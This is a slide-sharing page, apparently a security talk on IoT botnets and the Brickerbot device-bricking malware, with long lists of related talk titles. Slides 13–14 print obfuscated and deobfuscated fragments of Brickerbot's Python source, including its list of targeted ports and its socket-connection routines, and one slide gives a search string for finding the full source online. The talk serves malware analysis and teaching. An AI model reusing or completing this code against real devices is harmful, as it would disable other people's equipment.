Practical IoT Security in the Enterprise
Daniel Miessler
 
INSECURE Magazine - 35
INSECURE Magazine - 35INSECURE Magazine - 35
INSECURE Magazine - 35
Felipe Prado
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Codemotion
 
The difference between a duck
The difference between a duckThe difference between a duck
The difference between a duck
SensePost
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
GangSeok Lee
 
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
Codemotion
 
ICOs Good The Bad and the Ugly
ICOs Good The Bad and the UglyICOs Good The Bad and the Ugly
ICOs Good The Bad and the Ugly
Value Amplify Consulting
 
Presentation 'a web application security' challenge
Presentation 'a web application security' challengePresentation 'a web application security' challenge
Presentation 'a web application security' challenge
Dinis Cruz
 
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Casey Ellis
 
Essay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of BooksEssay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of Books
Tina Murillo
 
Bots and Botnet
Bots and BotnetBots and Botnet
Bots and Botnet
Hicube Infosec
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
n|u - The Open Security Community
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
Smart Assessment
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
Praveen Vackayil
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
Less is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OLess is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/O
Michael Roytman
 
There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleep
Jimmy Shah
 
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTBYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
Jimmy Shah
 

More Related Content

Similar to Brick all the internet of things!(with notes)

Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
EC-Council
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Codemotion
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
 
Zero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdfZero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdf
Thijs Ebbers
 
Practical IoT Security in the Enterprise
Practical IoT Security in the EnterprisePractical IoT Security in the Enterprise
Practical IoT Security in the Enterprise
Daniel Miessler
 
INSECURE Magazine - 35
INSECURE Magazine - 35INSECURE Magazine - 35
INSECURE Magazine - 35
Felipe Prado
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Codemotion
 
The difference between a duck
The difference between a duckThe difference between a duck
The difference between a duck
SensePost
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
GangSeok Lee
 
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
Codemotion
 
ICOs Good The Bad and the Ugly
ICOs Good The Bad and the UglyICOs Good The Bad and the Ugly
ICOs Good The Bad and the Ugly
Value Amplify Consulting
 
Presentation 'a web application security' challenge
Presentation 'a web application security' challengePresentation 'a web application security' challenge
Presentation 'a web application security' challenge
Dinis Cruz
 
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Casey Ellis
 
Essay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of BooksEssay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of Books
Tina Murillo
 
Bots and Botnet
Bots and BotnetBots and Botnet
Bots and Botnet
Hicube Infosec
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
n|u - The Open Security Community
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
Smart Assessment
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
Praveen Vackayil
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
Less is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OLess is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/O
Michael Roytman
 

Similar to Brick all the internet of things!(with notes) (20)

Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Zero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdfZero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdf
 
Practical IoT Security in the Enterprise
Practical IoT Security in the EnterprisePractical IoT Security in the Enterprise
Practical IoT Security in the Enterprise
 
INSECURE Magazine - 35
INSECURE Magazine - 35INSECURE Magazine - 35
INSECURE Magazine - 35
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
 
The difference between a duck
The difference between a duckThe difference between a duck
The difference between a duck
 
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet[2010 CodeEngn Conference 04] Max - Fighting against Botnet
[2010 CodeEngn Conference 04] Max - Fighting against Botnet
 
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018
 
ICOs Good The Bad and the Ugly
ICOs Good The Bad and the UglyICOs Good The Bad and the Ugly
ICOs Good The Bad and the Ugly
 
Presentation 'a web application security' challenge
Presentation 'a web application security' challengePresentation 'a web application security' challenge
Presentation 'a web application security' challenge
 
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”
 
Essay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of BooksEssay In Hindi Language On Importance Of Books
Essay In Hindi Language On Importance Of Books
 
Bots and Botnet
Bots and BotnetBots and Botnet
Bots and Botnet
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
 
Security Challenges in Emerging Technologies
Security Challenges in Emerging TechnologiesSecurity Challenges in Emerging Technologies
Security Challenges in Emerging Technologies
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
 
Less is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OLess is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/O
 

More from Jimmy Shah

There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleep
Jimmy Shah
 
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTBYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
Jimmy Shah
 
Solar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experimentSolar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experiment
Jimmy Shah
 
Mobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmMobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmJimmy Shah
 
Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_
Jimmy Shah
 
Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'
Jimmy Shah
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Jimmy Shah
 
Smartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkitsSmartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkits
Jimmy Shah
 

More from Jimmy Shah (8)

There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleep
 
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTBYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
 
Solar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experimentSolar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experiment
 
Mobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmMobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vm
 
Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_
 
Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'
 
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareIsn't it all just SMS-sending trojans?: Real Advances in Android Malware
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
 
Smartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkitsSmartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkits
 

Recently uploaded

Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 

Recently uploaded (20)

Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 

Brick all the internet of things!(with notes)

  • 1. Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
  • 2. Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
  • 3. Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
  • 4. DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
  • 5. DDOS via IoT Botnet ● Similar to DDOSaaS ○ Except the bots are free ■ Even more free? Due to default creds. Mirai Linux.Wifatch Linux.Hajime
  • 7.
  • 8. So, Brickerbot? ● What’s bricking? ○ Turning a useful device into something as useful as a ‘brick’
  • 9. Brickerbot: source code ● Want a copy of Brickerbot? ○ Google ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1” ● Mirrored on github and various pastebin like sites
  • 10. Aside: Malware analysis process - under pressure ● Not always enough time ○ fully unwind and solve every aspect of every puzzle within a sample ■ That’s called ‘vacation’ ● Interested parties breathing down analysts’ necks ○ Customers, bosses, competitors, press ■ Handling these is ‘the job’ ● Identify IOCs(Indicators of Compromise) ○ What is the least I need to see before I know my home/office/business is irrecoverable?
  • 11. Brickerbot: Getting to the heart of the issue ● Malware analysis ○ Get it running(VM, python(s), no network) ■ Nope, bad interp. Python2 ■ Nope, symbol not found. ‘Extra’ whitespace. ■ Nope, libraries not imported. Enough nonsense. ○ De-obfuscate ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’. ● (still, become friends with tokenizer.py) ■ Custom script to remove dead code ● Become friends with PyLint ■ Pretty-print remainder of source
  • 12. Brickerbot: Getting to the heart of the issue,cont. ● Malware analysis ○ Examine low-hanging fruit ■ Strings ● Seriously ● First step used by malware analysts ■ Read reports by other analysts ● Catch what you missed/ran out of time to find ● Re-prioritize resources towards areas that have greatest impact
  • 13. Brickerbot: Source code - obfusc., ex. whitespace 1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI 2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo 4. if 21 - 21: Oooo - I11I1Ii 5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO 6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO 7. time . sleep ( 3 ) 8. if 20 - 20: Oo0 9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO 12. if 84 - 84: I11I1Ii * Ii11i1iIi 13. I1IiI1I1 = OOo0O0oOOOO 14. if 4 - 4: Oooo + oOOo0000o 15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 16. i111IIIiII1i = False 17. Oo0O00OOooO = False 18. IiiI1 = False 19. oOI11IIIi1II111 = True 20. iiIII11I1i1Ii = True 21. I1i = True 22. i11iiiIi = True 23. i1iii = True 24. OOoOo00oO0 = True 25. OO00oo0o = True 26. if 5 - 5: IIiII + O0oo - i1 27. if 52 - 52: oOoO0Ooo / Ii / Ii 28. if 24 - 24: oOOoO00oo0 29. i11 = [ ] 30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ] 31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
  • 14. Brickerbot: Source code - eliminate dead code 1. def IIi1IIii11I1I(targetip, targetport): 2. global i1Iiii1i11i 3. O0000oO0O = (targetip, int(targetport)) 4. I11i1I = hash(O0000oO0O) 5. if I11i1I in iIIiii11Ii1: 6. return 7. IiI1i1ii1[I11i1I] = 0 8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport)) 9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60 10. iIoO000oO[I11i1I] = None 11. iIIiii11Ii1.append(I11i1I) 12. 13. def i1iiiiIi(targetip, targetport, jobhash): 14. O0000oO0O = (targetip, int(targetport)) 15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16. O0OOo00o00o.setblocking(0) 17. try: 18. O0OOo00o00o.connect(O0000oO0O) 19. except: 20. pass 21. I11i1I = hash(O0OOo00o00o) 22. O00OiiI1iIiiI.append(O0OOo00o00o) 23. Oooo0[I11i1I] = (targetip, int(targetport)) 24. Iii1iiiI[I11i1I] = 0 25. i1I11IIIIIi[I11i1I] = time.time() 26. I1iiO000o00o0[I11i1I] = jobhash 27. iIoO000oO[jobhash] = O0OOo00o00o 28. return O0OOo00o00o
